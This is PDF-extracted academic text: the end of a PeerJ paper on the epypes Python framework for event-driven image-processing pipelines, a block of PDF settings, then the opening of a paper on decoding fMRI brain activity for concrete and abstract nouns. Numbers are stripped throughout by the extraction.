notebooks, simple scripts etc.) tested and documented procedures (python functions and classes) computational graphs (compgraph, compgraphrunner, tokenmanager) non-reactive components (node, pipeline) reactive components (sourcepipeline, sinkpipeline, fullpipeline) customized components (custom nodes, pipelines, middleware adapters) t o w a rd s m o re s tr u ct u re a n d r e a ct iv ity figure layered system development framework. full-size doi: . /peerj-cs. /fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ system description as shown in fig. , the case system is comprised of three nodes: ( ) the robot control node, ( ) the image acquisition service, and ( ) the epypes-based image processing node. the robot control node coordinates the robot’s work cycle and realizes communication with external systems. the system performing stereo acquisition from two cameras is designed as a streaming service, built using the fxis framework (semeniuta & falkman, ). for each associated camera, a stream of images is captured in its own thread of execution, and a number of recent frames are retained at each moment. external systems can request images from the service that closely correspond to the request timestamp. the nodes run in the distributed environment and communicate through zeromq publish/subscribe sockets and in-process blocking queues. for publishing and subscribing, epypes provides two thread-based abstractions, namely zmqpublisher and zmqsubscriber. the former encapsulates a zeromq pub socket and acts as a consumer of an in-process queue: as a new data is available on the queue, it gets published. an example in fig. is the pub /qout pair. zmqsubscriber encapsulates a zeromq sub socket, which is polled with the poller object. on arrival of a new message, the latter is put on the connected in-process queue. an example in fig. is the sub /qin pair the robot control node runs on an arm-based raspberry pi single-board computer with the raspbian operating system, while the vision-related components are deployed to an ubuntu-based x - machine. the latter has an ethernet connection to a stereo camera pair (gige vision-based prosilica gc ), which are used by the image acquisition node. the following communication loop is considered: . robot announces request for timely image processing results; the image request is announced asynchronously as an event at pub . . images most closely associated with the request are acquired and, as a tuple of numpy. ndarray, communicated to the processing component via the common in-process queue qimages. . image processing node extracts the desired features from the images, which are communicated back to the robot via the pub /sub asynchronous socket pair. robot control node pub sub pub sub image acquisi�on service qin …qimages qout figure system configuration. full-size doi: . /peerj-cs. /fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the target vision algorithm performs orb feature detection, description, and matching (rublee & bradski, ). figure shows the corresponding computational graph. after image features are identified in each image, collections of feature descriptors are matched against each other using opencv’s bfmatcher object, with the matches returned in sorted order by match distance. the final gather_keypoints function produces an array of the matched keypoints’ coordinates. the communicated messages that are send over wire are serialized in the google’s protocol buffers (protobuf) interchange format. three message types are used: � attributelist represents a collection of key/value attributes, where an attribute can be either a string, a double, or an int . � event, sent over pub /sub , is comprised of an id (string), a type (string), and attributes (attributelist); � justbytes, sent over pub /sub , is comprised of an id (string), content (bytes), and attributes (attributelist); the computational graph shown in fig. forms a basis for an instance of a fullpipeline. its event dispatcher fin handles tuples with pairs of images put onto qimages. the output preparation function fout is responsible for packaging the output data as a justbytes protobuf message, with its content being the pickle-serialized value of the first rows of the keypoints_paired token (numpy.ndarray), and the attributes filled by timestamps and durations captured with the image acquisition service and the epypes pipeline. time measurement experiment the robot control node announces a series of vision requests and extracts attributes from the response protobuf messages. in addition, it records the timestamps of when the vision request get announced (tvreq) and when the corresponding response is obtained (tvresp). detect_and_describe_features_ keypoints_ descriptors_ gather_keypoints match keypoints_paired matches detect_and_describe_features_ keypoints_ descriptors_ mask_ wta_kfastthreshold nfeatures edgethreshold crosscheck image_ nlevels image_ scalefactor mask_ scoretype normtype patchsize figure orb computational graph. full-size doi: . /peerj-cs. /fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the difference between these timestamps accounts for the trip duration of the current request: ttrip ¼ tvresp � tvreq for execution of both the image acquisition service and the vision pipeline, two timestamps are added to the properties set: treact, when the component reacted to the incoming event, and tpub, right before publishing the outgoing event. their difference tr!p provides the measurement of the component’s processing time, including processing of incoming and outgoing events: tr!p ¼ tpub � treact properties related to the vision pipeline that get added to the outgoing protobuf message comprise vision processing time sp, overhead from orchestrating the computational graph ocg, and timestamps of start and finish of the event dispatcher fin tfin"; tfin# � � and the output preparation function fout tfout"; tfout# � � , which define the corresponding function durations: sfin ¼ tfin# � tfin" sfout ¼ tfout# � tfout" computational graph overhead ocg is measured internally by the pipeline (p.compute_overhead()), and constitutes the difference between total processing time of the pipeline and the sum of processing times of all the enclosed nodes: ocg ¼ sp � � x fsn for each node n pg after each request is finished, the robot control node records all the obtained properties. the latter are further aggregated in a pandas data frame, with a row of properties’ values per each request. from the available data, the following overhead metrics can be computed: . network overhead measures how much the trip duration is greater than the time spent in all the components: onetwork ¼ strip � ðtðimage acquistitionÞr!p þ tðvision pipelineÞr!p Þ . epypes overhead is computed as an excess time in the vision pipeline in addition to the processing in the computational graph and in the functions fin and fout: oepypes ¼ sðvision pipelineÞr!p � ðsp þ sfin þ sfoutÞ figure demonstrates the timeline of vision requests and the associated durations of the image acquisition service, the vision pipeline, and the overhead from network communication. data has been collected from five experiments, each with vision requests. for each experiment, a maximum likelihood estimation of log-normal probability density function is performed for distributions of ocg and oepypes. the same estimation is performed for all data combined. figures and show visualization of these pdfs. a pdf for each individual experiment is visualized as a shaded area under the curve. the pdf for all data is shown as a thick curve. the thin vertical line specify the semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ modal value of the pdf for the combined dataset, and the enclosing thick vertical lines delimit the overall range of measurements for the combined dataset. it can be seen from fig. that overhead from performing data processing based on a computational graph ocg is characterized by matching log-normal distributions for every experiment, with most of the probability density located around . ms. the epypes overhead oepypes, as shown in fig. , has much tighter range of possible values, distributed log-normally with matching distributions for every experiment, and with most of the probability density around . ms. overall, for a vision algorithm that naturally requires tens of milliseconds to perform the processing, the overheads introduces by epypes can be considered negligible. related work the idea of explicit utilization graph-based representation of data processing algorithms has been on the surface for many years. the availability of engineering tools, data science figure components’ durations and network overhead for a series of vision requests. full-size doi: . /peerj-cs. /fig- figure computational graph overhead. full-size doi: . /peerj-cs. /fig- figure epypes overhead. full-size doi: . /peerj-cs. /fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ frameworks, and modeling formalisms, described in the background section, shows the efficacy of the pipeline thinking when designing systems with streaming logic. the distinctive approach of epypes lies in its tight integration with the python ecosystem, support for algorithm prototyping, and abstractions for integration of the developed computational graphs into distributed systems. the epypes architecture is a logical continuation of the concept of discrete event data flow, earlier presented by semeniuta & falkman ( ). this earlier work attempted to define a data flow formalism with distinct notion of event as the one used in publish/subscribe systems. however, the presented formalism didn’t include a reference implementation at the time. epypes has, in turn, refined the notion of reactive pipelines and made it usable in real scenarios. other highly related work within the formal methods domain is stream algebra (helala, pu & qureshi, ), with its go-based implementation (helala, pu & qureshi, ). this approach models an image processing algorithm as a set of data streams that get altered by a set of operators. in the algebra implementation, a stream corresponds to a go channel, and the set of defined operators allow to define usable workflow patterns such as pipeline graphs, fork-join graphs, and pipeline graphs with feedback. the latter option is naturally supported due to the concurrency features of go. this approach, similarly to epypes, allows to construct high level algorithm from finer functions, including those from the opencv library. the distinctive feature is the support for feedback, which is disallowed in epypes due to the acyclicity requirement. the feedback with epypes, however, can be realized on a higher systemic level, by incorporating additional distributed components. in the contemporary robotics research, the robot operating system (ros) is widely used as the underlying platform for the distributed robotic applications relying on data from sensors and cameras. the general architecture in this case is based on a collection of nodes that react to arrival of data through publish/subscribe topics, which makes the overall logic graph-based. the related concept of nodelet (and component in ros ) allows to realize a processing graph structure as a part of a single operating system process. examples of this approach is often demonstrated on the applications of point cloud processing (rusu & cousins, ; munaro et al., ; carraro, munaro & menegatti, ), as to minimize latency due to inter-process or remote communication. ros-based processing graphs, especially in the single-process case, are somewhat similar to epypes pipelines. they, however, target applications with already developed algorithms, as opposed to epypes, which supports early-stage prototyping using the graph-based abstractions. other academic examples of similar robot/vision architectures include the one based on the supervisory control theory of discrete-event systems (košecka, christensen & bajcsy, ) and service-oriented dataflow-like components, auto-tuned by higher-level supervisors (crowley, hall & emonet, ). conclusions and further work this paper has presented epypes, an architecture and python-based software framework for building event-driven data processing pipelines. because most of vision semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithms and many data processing routines are naturally modeled as pipelines, epypes offers a capability of implementing data processing systems as dags. apart from the functional components comprising the prototype implementation of epypes, this paper has presented a system development framework that supports evolution of computational graphs from an early prototyping phase to their deployment as reactive pipelines. the principle of the epypes abstraction is demonstrated on the example of constructing a computational graph for edge detection and discussing the inner structure of the hierarchy of pipelines. further, a real scenario of deployment of an epypes pipeline for features detection and matching to a distributed system is experimentally studied. it was shown that the ability to adapt reactive behavior to various publish/subscribe middleware solutions allows to combine epypes pipelines with already available systems. the measured timing properties of the image processing component based on epypes show that the latter introduces negligible overhead comparing to the application-inherent processing time. an important part of further work should be connected with development of software abstractions on the highest level of the system development continuum shown in fig. . this will enable fine-tuning and enhancing of reactive pipelines, for example, with adapters to different messaging systems (e.g., mqtt, rabbitmq, dds), parallelizable nodes, and specialized pipeline management logic. an important task in this case is implementation of systematic error handling. a failure inside the pipeline (e.g., in the case of a vision system, due to changed lighting conditions) can be handled by issuing the corresponding event that will be processed by a remote component. in addition to queues providing asynchronous messaging, other communication modalities can be used. an rpc api (such as rest or grpc) can be established to allow external systems getting meta-information about the running pipeline and changing values of hyperparameters. last, but not least, functionality for interaction with databases should be integrated. as the presented software framework is implemented in python, it naturally gears toward system prototyping use cases. the static abstractions are useful for algorithm prototyping, while the transition to the reactive components allow for rapid deployment of the computational graphs to distributed environments. this allows for harnessing the available python data science tools and integrating them into industrial automation workflow. the limitation of the proposed implementation lies in its non-deterministic overhead due to the use of the interpreted garbage-collected programming language. hence, applications requiring high rate of operation and more deterministic running time are more likely to be developed in c++ with custom udp-based communication protocols or real-time middleware such as dds. it is of interest therefore to validate the principles of epypes using c++ codebase, as well as to devise a strategy of transforming epypes-based computational graphs to high-performance computing components, for example, via code generation. semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding this paper was written in association with the multimat project and sfi manufacturing, funded by the norwegian research council. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosure the following grant information was disclosed by the authors: multimat project and sfi manufacturing, funded by the norwegian research council. competing interests the authors declare that they have no competing interests. author contributions � oleksandr semeniuta conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � petter falkman authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the source code of the epypes library is available at github: https://github.com/semeniuta/epypes. references carraro m, munaro m, menegatti e. . a powerful and cost-efficient human perception system for camera networks and mobile robotics. in: chen w, hosoda k, menegatti e, shimizu m, wang h, eds. intelligent autonomous systems . ias . advances in intelligent systems and computing. vol. . cham: springer, – . cassandras c, lafortune s. . introduction to discrete event systems. new york: springer. crowley jl, hall d, emonet r. . autonomic computer vision systems. in: international conference on computer vision systems, icvs. vol. . bielefeld: applied computer science group. dworak a, ehm f, charrue p, sliwinski w. . the new cern controls middleware. journal of physics: conference series ( ): doi . / - / / / . helala ma, pu kq, qureshi fz. . a stream algebra for computer vision pipelines. ieee conference on computer vision and pattern recognition workshops, columbus, oh. piscataway: ieee, – doi . /cvprw. . . helala m, pu kq, qureshi f. . a formal algebra implementation for distributed image and video stream processing. in: proceedings th international conference on distributed smart cameras (icdsc ). new york: acm. hinze a, sachs k, buchmann a. . event-based applications and enabling technologies. in: proceedings of the third acm international conference on distributed event-based systems—debs ’ . new york: acm press, . semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/semeniuta/epypes http://dx.doi.org/ . / - / / / http://dx.doi.org/ . /cvprw. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ košecka j, christensen hi, bajcsy r. . discrete event modeling of visually guided behaviors. international journal of computer vision ( ): – doi . /bf . lee ea, seshia sa. . introduction to embedded systems, a cyber-physical systems approach. second edition. cambridge: mit press. magnoni l. . modern messaging for distributed sytems. journal of physics: conference series ( ): – . munaro m, basso f, michieletto s, pagello e, menegatti e. . a software architecture for rgb-d people tracking based on ros framework for a mobile robot. in: frontiers of intelligent autonomous systems.. vol. . berlin, heidelberg: springer, – . rublee e, bradski g. . orb—an efficient alternative to sift or surf. piscataway: ieee, – . rusu rb, cousins s. . d is here: point cloud library (pcl). in: proceedings—ieee international conference on robotics and automation. piscataway: ieee, – . semeniuta o, falkman p. . discrete event dataflow as a formal approach to specification of industrial vision systems. in: ieee international conference on automation science and engineering (case), vol. -october. piscataway: ieee, – . semeniuta o, falkman p. . flexible image acquisition service for distributed robotic systems. in: second ieee international conference on robotic computing (irc). piscataway: ieee, – . zeromq. . broker vs. brokerless. available at http://zeromq.org/whitepapers:brokerless (accessed february ). semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /bf http://zeromq.org/whitepapers:brokerless http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ epypes: a framework for building event-driven data processing pipelines introduction background epypes conclusions and further work references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice visually grounded and textual semantic models differentially decode brain activity associated with concrete and abstract nouns andrew j. anderson brain & cognitive sciences university of rochester aander @ur.rochester.edu douwe kiela computer laboratory university of cambridge dk @cam.ac.uk stephen clark computer laboratory university of cambridge sc @cam.ac.uk massimo poesio school of computer science and electronic engineering university of essex poesio@essex.ac.uk abstract important advances have recently been made using computational semantic models to de- code brain activity patterns associated with concepts; however, this work has almost ex- clusively focused on concrete nouns. how well these models extend to decoding abstract nouns is largely unknown. we address this question by applying state-of-the-art compu- tational models to decode functional magnetic resonance imaging (fmri) activity patterns, elicited by participants reading and imagin- ing a diverse set of both concrete and abstract nouns. one of the models we use is linguistic, exploiting the recent word vec skipgram ap- proach trained on wikipedia. the second is visually grounded, using deep convolutional neural networks trained on google images. dual coding theory considers concrete con- cepts to be encoded in the brain both linguisti- cally and visually, and abstract concepts only linguistically. splitting the fmri data accord- ing to human concreteness ratings, we indeed observe that both models significantly decode the most concrete nouns; however, accuracy is significantly greater using the text-based mod- els for the most abstract nouns. more gener- ally this confirms that current computational models are sufficiently advanced to assist in investigating the representational structure of abstract concepts in the brain. introduction since the work of mitchell et al. ( ), there has been increasing interest in using computational se- mantic models to interpret neural activity patterns scanned as participants engage in conceptual tasks. this research has almost exclusively focused on brain activity elicited as participants comprehend concrete nouns as experimental stimuli. different modelling approaches — predominantly distribu- tional semantic models (mitchell et al., ; de- vereux et al., ; murphy et al., ; pereira et al., ; carlson et al., ) and semantic mod- els based on human behavioural estimation of con- ceptual features (palatucci et al., ; sudre et al., ; chang et al., ; bruffaerts et al., ; fernandino et al., ) — have elucidated how dif- ferent brain regions contribute to semantic represen- tation of concrete nouns; however, how these results extend to non-concrete nouns is unknown. in computational modelling there has been in- creasing importance attributed to grounding seman- tic models in sensory modalities, e.g., bruni et al. ( ), kiela and bottou ( ). andrews et al. ( ) demonstrated that multi-modal models formed by combining text-based distributional in- formation with behaviourally generated conceptual properties (as a surrogate for perceptual experience) provide a better proxy for human-like intelligence. however, both the text-based and behaviourally- based components of their model were ultimately derived from linguistic information. since then, in analyses of brain data, anderson et al. ( ) have applied multi-modal models incorporating features that are truly grounded in natural image statistics to further support this claim. in addition, anderson et al. ( ) have demonstrated that visually grounded models describe brain activity associated with inter- nally induced visual features of objects as the ob- transactions of the association for computational linguistics, vol. , pp. – , . action editor: daichi mochihashi. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. jects names are read and comprehended. having both image- and text-based models of se- mantic representation, and neural activity patterns associated with concrete and abstract nouns, enables a natural test of dual coding theory (paivio, ). dual coding posits that concrete concepts are repre- sented in the brain in terms of a visual and linguis- tic code, whereas abstract concepts are only repre- sented by a linguistic code. whereas previous work has demonstrated that image- and text-based seman- tic models contribute to explaining neural activity patterns associated with concrete nouns, it remains unclear whether either text- or image-based seman- tic models can decode neural activity patterns asso- ciated with abstract words. we extend previous work by applying image- and text-based computational semantic models to de- code an fmri data set spanning a diverse set of nouns of varying concreteness. the -word stim- uli for the fmri experiment (listed in table ) are semantically structured according to taxonomic cat- egories and domains embedded in wordnet (fell- baum, ) and its extensions. participants read the noun and were instructed to imagine a situation that they personally associate with the noun. in this sense, the data solicited was targetting deep thought patterns (deeper than might be anticipated for rapid semantic processing required in conversations and many real time interactions with the world). in the analysis we split the fmri data set into the most con- crete and most abstract words based on behavioural concreteness ratings. our key contribution is in demonstrating a decoding advantage for text-based semantic models over the image-based models when decoding the more abstract nouns. in line with the previous results of anderson et al. ( ) and an- derson et al. ( ), both visual and textual models decode the more concrete nouns. the image- and text-based computational models we use have recently been developed using neural networks (mikolov et al., ; jia et al., ). the image-based model is built using a deep con- volutional neural network approach, similar in na- ture to those recently used to study neural represen- tations of visual stimuli (see kriegeskorte ( ), al- though note this is the first application to study word elicited neural activation known to the authors). for decoding we use a recently introduced algorithm (anderson et al., ) that abstracts the decoding task to representational similarity space, and achieve decoding accuracies on par with those convention- ally achieved through discriminating concrete nouns (and higher if we combine data to exploit group- level regularities). because the fmri experiments were performed in italian on native italians, and because approximately comparable text corpora in content were available in english and italian (english and italian wikipedia), we were able to compare how well english and ital- ian text-based semantic models can decode neural activity patterns. whilst italian wikipedia could reasonably be expected to be advantaged by sup- porting culturally appropriate nuances of seman- tic structure, it is disadvantaged by being consider- ably smaller than english wikipedia. taking inspi- ration from previous work exploiting cross-lingual resources (richman and schone, ; shi et al., ; darwish, ) we combined italian and en- glish text-based models in our decoding analyses in an attempt to leverage the benefits of both. although combined language and english models tended to yield marginally better decoding accura- cies, there were no significant differences between the different language models. whilst we expect se- mantic structure on a grand scale to broadly straddle language boundaries for most concrete and abstract concepts (albeit with cultural specificities), this is proof of principle that cross linguistic commonali- ties are reflected in neural activity patterns measur- able with current technology. brain data we reanalyze the fmri data originally collected by anderson et al. ( ), who investigated the rel- evance of different taxonomic categories and do- mains embedded in wordnet to the organization of conceptual knowledge in the brain. . word stimuli anderson et al. ( ) systematically selected a list of words intended to be representative of a broad range of abstract and concrete nouns. these were organised according to the domains of law and music, cross-classified with seven taxonomic cate- gories. they began by identifying low-concreteness law music ur-abstracts giustizia justice musica music liberta’ liberty blues blues legge law jazz jazz corruzione corruption canto singing refurtiva loot punk punk attribute giurisdizione jurisdiction sonorita’ sonority cittadinanza citizenship ritmo rhythm impunita’ impunity melodia melody legalita’ legality tonality’ tonality illegalita illegality intonazione pitch communication divieto prohibition canzone song verdetto verdict pentagramma stave ordinanza decree ballata ballad addebito accusation ritornello refrain ingiunzione injunction sinfonia symphony event/action arresto arrest concerto concert processo trial recital recital reato crime assolo solo furto theft festival festival assoluzione acquital spettacolo show person/social-role giudice judge musicista musician ladro thief cantante singer imputato defendant compositore composer testimone witness chitarrista guitarist avvocato lawyer tenore tenor location tribunale court/tribunal palco stage carcere prison auditorium auditorium questura police-station discoteca disco penitenziario penitentiary conservatorio conservatory patibolo gallows teatro theatre object/tool manette handcuffs violino violin toga robe tamburo drum manganello truncheon tromba trumpet cappio noose metronomo metronome grimaldello skeleton-key radio radio table : italian stimulus words and english translations, divided into law and music domains (columns), and taxo- nomic categories (groups of rows). the most concrete half of the words are indicated in bold font. strike-throughs indicate words for which we did not have semantic model coverage. words in the norms of barca et al. ( ). they then linked these to wordnet to identify the taxonomic category of the dominant sense of each word. six taxonomic categories that were heavily populated with abstract words, as well as one unambiguously concrete category, were chosen. all categories sup- ported ample coverage of law and music domains (determined according to wordnet domains (ben- tivogli et al., )). five law words and five music words were selected from each taxonomic category. taxonomic categories and example stimulus words (translated into english) are as below: ur-abstract: anderson et al.’s term for concepts that are classified as abstract in wordnet but do not belong to a clear subcategory, e.g., law or music. at- tribute: a construct whereby objects or individuals can be distinguished, e.g., legality, tonality. com- munication: something that is communicated by, to or between groups, e.g., accusation, symphony. event/action: something that happens at a given place and time, e.g., crime, festival. person/social- role: individual, someone, somebody, mortal, e.g., judge, musician. location: points or extents in space, e.g., court, theatre. object/tool: a class of unambiguously concrete nouns, e.g., handcuffs, vio- lin. the full list of stimuli is in table . we split the stimulus nouns into the most concrete and most abstract words according to the behavioural concreteness ratings from anderson et al. ( ). . fmri experiment participants nine right-handed native italian speakers aged between and years ( women) were recruited to take part in the study. two were scanned after anderson et al. ( ) to match the number of participants analysed by mitchell et al. ( ). scanning had previously been halted at in- stead of the planned participants for a period due to equipment failure. all had normal or corrected- to-normal vision. the stimulus words were presented as written words, in runs (all runs were collected in one par- ticipant visit), with the order of presentations ran- domised across runs. in each run, a randomly se- lected word was presented every seconds, and re- mained on screen for seconds. on reading a stim- ulus word, participants thought of a situation that they individually associated with the noun. this pro- cess is similar to previous concrete noun tasks, e.g., mitchell et al. ( ), where participants were in- structed to think of the properties of the noun. how- ever, as people encounter difficulties eliciting prop- erties of non-concrete concepts, compared to think- ing of situations in which concepts played a role (wiemer-hastings and xu, ), the experimental paradigm was adapted to imagining situations. fmri acquisition and preprocessing anderson et al. ( ) recorded fmri images on a t bruker medspec mri scanner. they used an echo planar imaging (epi) pulse sequence with a msec rep- etition time, an echo time of msec, and a ◦ flip angle. a × acquisition matrix was used, and slices were imaged with a between-slice gap of mm. voxels had dimensions of mm× mm× mm. fmri data were corrected for head motion, un- warped, and spatially normalized to the montreal neurological institute and hospital (mni) template. only voxels estimated to be grey matter were in- cluded in the subsequent analysis. for each partic- ipant, for each scanning run (where a run is a com- plete presentation of words), voxel activity was corrected by removing linear trend and transformed to z scores (within each run). each stimulus word was represented as a single volume by taking the voxel-wise mean of the sec of data offset by sec from the stimulus onset (to account for hemo- dynamic response). voxel selection the most stable grey mat- ter voxels per participant were selected for analy- sis. this was undertaken within the leave- -word- out decoding procedure detailed later in section using the same method as mitchell et al. ( ): pearson’s correlation of each voxel’s activity be- tween matched word lists in all scanning run pairs ( unique run pairs giving correlation coeffi- cients of / words, where the other words were test words to be decoded) was computed. the mean coefficient was used as stability measure. voxels as- sociated with the largest stability measures were selected. semantic models . image-based semantic models following previous work in multi-modal semantics (bergsma and van durme, ; kiela et al., ), we obtain a total of images for each of the stim- ulus words from google images . images from google have been shown to yield representations that are competitive in quality compared to alterna- tive resources (bergsma and van durme, ; fer- gus et al., ). image representations are obtained by extracting the pre-softmax layer from a forward pass in a convolutional neural network (cnn) that has been trained on the imagenet classification task using caffe (jia et al., ). this approach is simi- lar to e.g., kriegeskorte ( ), except that we only use the pre-softmax layer, which has been found to work particularly well in semantic tasks (razavian et al., ; kiela and bottou, ). such cnn- derived image representations have been found to be of higher quality than traditional bag of visual words models (sivic and zisserman, ) that were pre- viously used in multi-modal semantics (bruni et al., ; kiela and bottou, ). we aggregate im- ages associated with a stimulus word into an overall visually grounded representation by taking the mean of the individual image representations. image search for abstract nouns the validity and success of the following analyses are depen- dent on having built the image-based models from a set of images that are indeed relevant to the ab- stract words. the google image searches we used www.google.com/imghp figure : representing brain and semantic model vectors in similarity space. to build the image-based models largely returned a selection of images systematically associated with our most abstract nouns. for instance, ‘corruption’ returns suited figures covertly exchanging money; ‘law’, ‘justice’, ‘music’, ‘tonality’ return pictures of gavels, weighing scales, musical notes and cir- cles of fifths, respectively. for ‘jurisdiction’, the image search returns maps and law-related objects. however, there were also misleading cases such as ‘pitch’ where the image search, whilst returning po- tentially useful pictures of sinusoidal graphs, was heavily contaminated by images of football pitches. this problem is not exclusive to images, and the cur- rent text-based models are also not immune to the multiple senses of polysemous words. . text-based semantic models for linguistic input, we use the continuous vec- tor representations from the skip-gram model of mikolov et al. ( ). 